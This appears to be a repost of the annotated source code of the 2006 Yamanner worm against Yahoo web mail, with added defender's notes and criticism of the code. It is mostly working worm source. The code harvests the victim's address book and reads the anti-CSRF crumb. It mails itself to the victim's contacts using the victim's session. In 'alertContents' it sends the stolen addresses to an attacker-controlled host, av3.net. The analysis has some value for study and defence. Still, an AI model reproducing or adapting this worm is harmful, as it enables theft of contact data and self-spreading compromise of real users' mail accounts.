



Yamanner Worm (SOURCE CODE)

B. Source Code for Yamanner Worm

The following is the annotated source code for the Yamanner worm, which infected Yahoo’s web mail portal in June 2006.

/**
 * Sends the stolen email addresses to the worm author
 *
 * Callback passed to makeRequest() by Getcrumb(). Once the Compose
 * POST has completed it navigates the browser (window.navigate is a
 * non-standard, Internet Explorer API) to an attacker-controlled host,
 * appending the harvested address list as the BCCList query parameter.
 * The rest of the path only imitates a Yahoo Mail folder URL.
 *
 * Defender's note: a full-page navigation to an unrelated domain whose
 * query string carries the address book is the most visible artifact
 * of this stage in browser history and proxy logs.
 *
 * Reads the globals http_request (set by makeRequest) and IDList
 * (set by ListContacts / GetIDs).
 *
 * The line breaks inside the string literal appear to be an artifact
 * of the printed listing.
 */

function alertContents() {
    //ensure the XMLHttpRequest has completed
    //(readyState 4 = DONE; the HTTP status is not checked here)
    if (http_request.readyState == 4) {
        window.navigate('http://www.av3.net/?ShowFolder&rb=Sent&

        reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&
        view=a&head=f&box=Inbox&ShowFolder?rb=Sent&reset=1&
        YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&

        box=Inbox&ShowFolder?rb=Sent&reset=1&YY=75867&inc=25&
        order=down&sort=date&pos=0&view=a&head=f&box=Inbox&
        BCCList=' + IDList)
    }
}

/**
 * Extracts the "crumb" from the response. This is a random hash
 * to prevent automated sending of mail
 *
 * Takes the HTML of the Compose page (fetched by ListContacts) and
 * returns the value of the hidden input named ".crumb", located by a
 * plain substring search: everything between the start marker and
 * the next double quote.
 *
 * Defender's note: the crumb is an anti-CSRF token and it does stop
 * cross-origin forgeries. It cannot stop this script, which evidently
 * runs inside the mail origin (it reads responseText of a same-origin
 * XHR) and therefore can read the token out of the page. A request
 * token is not a defence against script injection itself; the
 * injection vector that started this script is not shown in this
 * listing.
 *
 * @param {string} HtmlContent - response body of the Compose page
 * @returns {string} the crumb value. There is no check for a missing
 *   marker: indexOf() would return -1 and the substr arithmetic then
 *   yields an arbitrary slice rather than an error.
 *
 * None of the locals are declared with var, so StartString, EndString,
 * i, StartIndex, EndIndex, CutLen and crumb all become globals;
 * i is assigned but never used.
 */
function ExtractStr(HtmlContent) {
    //the double quote is written as the \u0022 escape; the original
    //annotation suggests the author could not use a literal quote in
    //the payload (its comparison to the Samy worm is truncated in
    //this listing)
    StartString = 'name=\u0022.crumb\u0022 value=\u0022';
    EndString = '\u0022';
    i = 0;

    //This is bad coding. This could have been done with a RegEx

    //StartIndex: position of the marker; EndIndex: the closing quote
    //after it; CutLen: length of the value between the two
    StartIndex = HtmlContent.indexOf(StartString, 0);
    EndIndex = HtmlContent.indexOf(EndString, StartIndex +
        StartString.length );
    CutLen = EndIndex - StartIndex - StartString.length;
    crumb = HtmlContent.substr(StartIndex + StartString.length ,
        CutLen );
    return crumb;
}

/**
 * Callback function which composes the email to spread the worm
 * to other people in the addressbook.
 *
 * Registered by ListContacts() on the GET of the Compose page. When
 * that response arrives it pulls the anti-CSRF crumb out of the HTML,
 * takes the message id and folder name from the Compose form's action
 * URL, fills a templated POST body and submits it to the Compose
 * endpoint with alertContents() as the next callback.
 *
 * Defender's note: every request here is a normal same-origin XHR
 * carrying the victim's session cookie, so server-side it looks like
 * the user forwarding a message; the distinguishing signals are the
 * large Bcc list, the fixed subject, and the timing (a Compose POST
 * issued immediately after an address-book export and a Compose GET).
 *
 * Reads the globals http_request, Server, Email, IDList and the
 * page's `compose` object; writes the globals HtmlContent, CRumb,
 * MyBody, MySubj, Url, MidIndex, incIndex, CutLen, QIndex, AIndex
 * and Param (none are declared with var).
 *
 * The line breaks inside the Param literal appear to be an artifact
 * of the printed listing.
 */
function Getcrumb() {
    if (http_request.readyState == 4) {
        if (http_request.status == 200) {
            HtmlContent = http_request.responseText;
            CRumb = ExtractStr(HtmlContent);
            //MyBody is never substituted into Param (see EMAILBODY
            //below), so the body text is the template's fixed
            //"Note: forwarded message attached." line
            MyBody = 'this is test';
            MySubj = 'New Graphic Site';
            Url = 'http://us.' + Server +
                '.mail.yahoo.com/ym/Compose';
            //presumably the page's Compose <form>, reachable as a
            //global through its name attribute — TODO confirm
            var ComposeAction = compose.action;
            //MyMid: the text between '&Mid=' and '&inc' in the form
            //action (5 = length of '&Mid=')
            MidIndex = ComposeAction.indexOf('&Mid=' ,0);
            incIndex = ComposeAction.indexOf('&inc' ,0);
            CutLen = incIndex - MidIndex - 5;
            var MyMid = ComposeAction.substr(MidIndex + 5, CutLen);
            //BoxName: the text between '?box=' and '&Mid'
            QIndex = ComposeAction.indexOf('?box=' ,0);
            AIndex = ComposeAction.indexOf('&Mid' ,0);
            CutLen = AIndex - QIndex - 5;
            var BoxName = ComposeAction.substr(QIndex + 5,
                CutLen);
            //Template of the form-encoded Compose POST body. The
            //upper-case tokens (RUMBVAL, EMAILMID, BOXNAME, EMAILSUBJ,
            //FROMEMAIL, TOEMAIL, BCCLIST) are placeholders filled in
            //by the replace() calls below
            Param = 'SEND=1&SD=&SC=&CAN=&docCharset=windows-1256&

                PhotoMailUser=&PhotoToolInstall=&
                OpenInsertPhoto=&PhotoGetStart=0&SaveCopy=no&
                PhotoMailInstallOrigin=&.crumb=RUMBVAL&
                Mid=EMAILMID&inc=&AttFol=&box=BOXNAME&

                FwdFile=YM_FM&FwdMsg=EMAILMID&FwdSubj=EMAILSUBJ&
                FwdInline=&OriginalFrom=FROMEMAIL&
                OriginalSubject=EMAILSUBJ&InReplyTo=&NumAtt=0&
                AttData=&UplData=&OldAttData=&OldUplData=&FName=&

                ATT=&VID=&Markers=&NextMarker=0&Thumbnails=&
                PhotoMailWith=&BrowseState=&PhotoIcon=&
                ToolbarState=&VirusReport=&Attachments=&

                Background=&BGRef=&BGDesc=&BGDef=&BGFg=&BGFF=&
                BGFS=&BGSolid=&BGCustom=&
                PlainMsg=%3Cbr%3E%3Cbr%3ENote%3A+forwarded+
                message+attached.&PhotoFrame=&

                PhotoPrintAtHomeLink=&PhotoSlideShowLink=&
                PhotoPrintLink=&PhotoSaveLink=&PhotoPermCap=&
                PhotoPermPath=&PhotoDownloadUrl=&PhotoSaveUrl=&
                PhotoFlags=&start=compose&bmdomain=&showcc=&

                showbcc=&AC_Done=&AC_ToList=0%2C&AC_CcList=&
                AC_BccList=&sendtop=Send&
                savedrafttop=Save+as+a+Draft&canceltop=Cancel&
                FromAddr=&To=TOEMAIL&Cc=&Bcc=BCCLIST&

                Subj=EMAILSUBJ&Body=%3CBR%3E%3CBR%3ENote%3A+
                forwarded+message+attached.&Format=html&
                sendbottom=Send&savedraftbottom=Save+as+a+Draft&
                cancelbottom=Cancel&cancelbottom=Cancel';
            Param = Param.replace('BOXNAME', BoxName);
            Param = Param.replace('RUMBVAL', CRumb);

            //IDList contains the victim's address book,
            //collected from a previous step

            //Email (first harvested address, set in GetIDs) goes in
            //To:, the remainder of IDList goes in Bcc:
            Param = Param.replace('BCCLIST', IDList);
            Param = Param.replace('TOEMAIL', Email);
            //the OriginalFrom value is printed here without an '@'
            Param = Param.replace('FROMEMAIL', 'av3yahoo.com');
            //neither EMAILBODY nor PlainMESSAGE occurs in the template
            //above, so these two calls change nothing
            Param = Param.replace('EMAILBODY', MyBody);
            Param = Param.replace('PlainMESSAGE', '');

            //JavaScript's replace() function only replaces
            //the first instance of a string, so the author
            //had to call the function multiple times
            //Again, a RegEx could have been used instead

            //EMAILSUBJ occurs three times in the template (FwdSubj,
            //OriginalSubject, Subj) and EMAILMID twice (Mid, FwdMsg)
            Param = Param.replace('EMAILSUBJ', MySubj);
            Param = Param.replace('EMAILSUBJ', MySubj);
            Param = Param.replace('EMAILSUBJ', MySubj);
            Param = Param.replace('EMAILMID', MyMid);
            Param = Param.replace('EMAILMID', MyMid);
            //submit the message; alertContents() runs when it completes
            makeRequest(Url , alertContents, 'POST', Param);
        }
    }
}

<br>/**
 * This function extracts out all the email addresses from a
 * victims address book and stores them in the variable IDList
 *
 * This function also tells us that the worm author was not
 * a sophisticated programmer. This entire function could be
 * replaced with a rather simple RegEx.
 *
 * Walks the address-book HTML (the QuickBuilder response fetched at
 * the bottom of the file) one table cell at a time, keeps every cell
 * value that contains "yahoo.com" or "yahoogroups.com", and builds a
 * comma-separated list. The first address is split off into the
 * global Email (used as the To: recipient by Getcrumb); the victim's
 * own address, read from two form fields on the page, is removed.
 *
 * @param {string} HtmlContent - response body of the address-book page
 * @returns {string} comma-separated list of harvested addresses; the
 *   same value is also left in the global IDList
 *
 * Side effects: assigns the globals IDList, Email, StartString,
 * EndString, i, StartIndex, EndIndex, CutLen, YahooID, IDListArray,
 * CurEmail and UserEmail (none are declared with var; i is counted
 * but never read).
 */
function GetIDs(HtmlContent) {
    IDList = '';
    StartString = ' <td>';
    EndString = '</td>';
    i = 0;
    StartIndex = HtmlContent.indexOf(StartString, 0);
    //loop ends when no further ' <td>' is found (indexOf returns -1)
    while(StartIndex >= 0) {
        //YahooID: the text between the current ' <td>' and the
        //following '</td>'
        EndIndex = HtmlContent.indexOf(EndString, StartIndex);
        CutLen = EndIndex - StartIndex - StartString.length;
        YahooID = HtmlContent.substr(StartIndex +
            StartString.length, CutLen);
        //if the email address if for yahoo.com or
        //yahoogroups.com
        if( YahooID.indexOf('yahoo.com', 0) > 0 ||
            YahooID.indexOf('yahoogroups.com', 0) > 0 )
            IDList = IDList + ',' + YahooID;

        //skip to the end of the current table row, then to the first
        //cell of the next row; the +20 offsets step past the tag just
        //matched (StartString is reassigned in between, so the two
        //searches look for different markers)
        StartString = '</tr>';
        StartIndex = HtmlContent.indexOf(StartString,
            StartIndex + 20);
        StartString = ' <td>';
        StartIndex = HtmlContent.indexOf(StartString,
            StartIndex + 20);
        i++;
    }

    //drop the leading comma left by the accumulation above
    if(IDList.substr(0,1) == ',')
        IDList = IDList.substr(1, IDList.length);
    //with two or more addresses: the first becomes the To: address
    //(global Email) and is removed from the Bcc list
    if(IDList.indexOf(',', 0)>0 ) {
        IDListArray = IDList.split(',');
        Email = IDListArray[0];
        IDList = IDList.replace(Email + ',', '');
    }
    //This code removes the email address of the victim who is
    //currently being exploited from the list. This way the worm
    //will not send a copy of itself to the same user it is
    //exploiting. Not to sound like a broken record, but a
    //RegEx would be much more efficient here
    //spamform.NE and showLetter.FromAddress are presumably form
    //fields of the mail page, reached as globals — TODO confirm
    CurEmail = spamform.NE.value;
    IDList = IDList.replace(CurEmail + ',', '');
    IDList = IDList.replace(',' + CurEmail, '');
    IDList = IDList.replace(CurEmail, '');
    UserEmail = showLetter.FromAddress.value;
    IDList = IDList.replace(',' + UserEmail, '');
    IDList = IDList.replace(UserEmail + ',', '');
    IDList = IDList.replace(UserEmail, '');
    return IDList;
}

/**
 * This function extracts the addressbook and starts composing an
 * email message to spread the worm
 *
 * Callback for the address-book request issued at the bottom of the
 * file. On a 200 response it hands the HTML to GetIDs() (which fills
 * the global IDList) and then fetches the Compose page, with
 * Getcrumb() as the next callback, to obtain the anti-CSRF crumb.
 *
 * Reads the globals http_request and Server; writes HtmlContent and
 * IDList.
 */
function ListContacts() {
    if (http_request.readyState == 4) {
        if (http_request.status == 200) {
            HtmlContent = http_request.responseText;
            IDList = GetIDs(HtmlContent);
            //rnd= is a cache-buster; Param is null because this is a GET
            makeRequest('http://us.' + Server +
            '.mail.yahoo.com/ym/Compose/?rnd=' + Math.random(),
            Getcrumb, 'GET', null);
        }
    }
}

/**
 * Reusable function to construct and send Ajax requests
 *
 * Creates a new XMLHttpRequest (or the ActiveX equivalent on older
 * Internet Explorer) in the global http_request, registers Func as
 * the onreadystatechange handler and sends the request
 * asynchronously. The callbacks in this file (ListContacts, Getcrumb,
 * alertContents) all read that global rather than receiving the
 * request object as an argument, so each call overwrites the previous
 * request.
 *
 * Defender's note: because this runs in the mail site's own origin,
 * the browser attaches the session cookie to every request here; no
 * credential theft is needed for the worm to act as the user.
 *
 * @param {string} url - request URL
 * @param {Function} Func - onreadystatechange callback
 * @param {string} Method - 'GET' or 'POST'
 * @param {string|null} Param - request body; ignored for GET
 */
function makeRequest(url, Func, Method, Param) {
    if (window.XMLHttpRequest) {
        http_request = new XMLHttpRequest();
    } else if (window.ActiveXObject) {
        http_request = new ActiveXObject('Microsoft.XMLHTTP');
    }
    //handler is attached before open(); third argument true = async
    http_request.onreadystatechange = Func;
    http_request.open(Method, url, true);
    if( Method == 'GET')
        http_request.send(null);
    else
        http_request.send(Param);
}

//Shared state used by the callbacks above. These var declarations
//are hoisted, so they are in effect before the functions run.
var http_request = false;   //current XHR, replaced by each makeRequest()
var Email = '';             //To: recipient, set in GetIDs()
var IDList = '';            //comma-separated Bcc list, set in GetIDs()
var CRumb = '';             //anti-CSRF crumb, set in Getcrumb()

//notice the typo! This webpage does not open!
//(the comma in the host name makes the URL invalid)
window.open('http://www,lastdata.com');

/*
Yahoo uses a CDN to load balance access to the mail portal.
This code figures out the domain name of the server the browser
Is currently using so it can construct an XHR to the appropriate
web server

This is unnecessary code. The attacker should have sent XHR
requests using relative URLs

Server ends up holding the text between 'us.' and '.mail' in url0
(3 = length of 'us.'). url0 is not defined in this listing;
presumably it is a global provided by the mail page — TODO confirm.
ServerUrl, USIndex, MailIndex and CutLen are undeclared globals.
*/

ServerUrl = url0;
USIndex = ServerUrl.indexOf('us.' ,0);
MailIndex = ServerUrl.indexOf('.mail' ,0);
CutLen = MailIndex - USIndex - 3;
var Server = ServerUrl.substr(USIndex + 3, CutLen);


//Starts everything going by fetching the victim's address book
//GET of the QuickBuilder address-book export (numadr=100 and
//date=180 are among the query parameters it sends); ListContacts()
//is the callback, which chains into Getcrumb() and alertContents().
//The line breaks inside the URL literal appear to be an artifact of
//the printed listing.
makeRequest('http://us.' + Server +
'.mail.yahoo.com/ym/QuickBuilder?build=Continue&cancel=&

continuetop=Continue&canceltop=Cancel&Inbox=Inbox&Sent=Sent&
pfolder=all&freqCheck=&freq=1&numdays=on&date=180&ps=1&
numadr=100&continuebottom=Continue&cancelbott
om=Cancel&rnd=' + Math.random(), ListContacts, 'GET', null)

					  


  

BY:MUNDO HACKER
